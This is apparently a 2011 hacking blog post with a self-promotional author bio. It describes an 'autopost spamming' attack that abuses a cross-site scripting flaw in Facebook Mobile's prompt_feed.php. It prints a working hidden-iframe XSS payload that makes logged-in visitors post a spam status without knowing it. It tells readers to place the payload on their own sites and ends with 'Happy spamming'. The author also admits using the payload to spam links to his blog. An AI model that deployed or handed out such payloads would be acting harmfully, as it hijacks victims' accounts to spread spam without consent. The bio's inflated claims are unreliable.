hahahah amol hacked ur ip address

Sign by Danasoft - For Backgrounds and Layouts

Author

Amol Bhure (ultra l33t) was born in Maharashtra, Seventh July Of Nineteen Hundred Nineteen Ninety A.D. He's currently pursuing his B.E in Bangalore. A cyber Security Professional, Hacker, Designer, Programmer. Keen interest in hacking and network security and he developed several techniques of defending and defacing websites. He's of the opinion that people should learn this art to prevent any cyber attacks. Currently Amol works as a member of 'Null International', Bangalore chapter as a network security guy. Apart from this, he has done internships at YAHOO! India, AMAZON India, etc. He has also attended various International conferences like NullCon GOA, c0c0n, ClubHack, Defcon , SecurityByte, ICFoCS, OWASP, etc.. He is certified with RHCE, LPT, CEH v7, SCJP, AFCEH. In programming he knows stuffs on C, C++, C# , JAVA (SCJP), .NET , and PHP. Additionally he knows few hardware languages like HDL, VHDL, Verilog, Embedded Micro controller Programming. He has been featured on google hall of fame. Amol was named a "India's top 10 hacker" by google. "World's top 50 hacking blog" by google.

Daily Page Views

Friday, April 15, 2011

Autopost Spamming using Facebook Mobile XSS



@amol: What has happened out there really pushes me to share this out. I call this an Autopost Spamming using Facebook Mobile XSS. I dont care anymore if this one will be filtered, the faster they fix it, the better. People dont seem to care how hard i tried to hide this code from facebook team. frankly, i also use this to post spam with link to this blog, but it only affects indonesian ip + with a custom interval. So people outside indonesia wont be able to see this. Too bad it’s now spread like a worm everywhere wide open without any source code protection....@mol
Nevermind, it’s no use to complain about what has happened anyway. Let’s talk about this in details. This is about how to make an autopost status update to people’s facebook profile. This method uses XSS vulnerability of prompt_feed.php from m.facebook.com. When people see our page with this evil code, they will automatically post a status update with any message we want.
Below is the iframe HTML source code :


<iframe id="amol-hackinglibrary" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Just visited http://tinyurl.com/ultral33t-amol Wow.. amol cool! nice page dude!!!';document.forms[0].submit();}</script>"></iframe>


Put the code above on your website, change the red code with your own message. Whenever facebook logged in users see your page the message will be posted automatically to their wall.
That’s all. Happy spamming :(


@mol



Post a Comment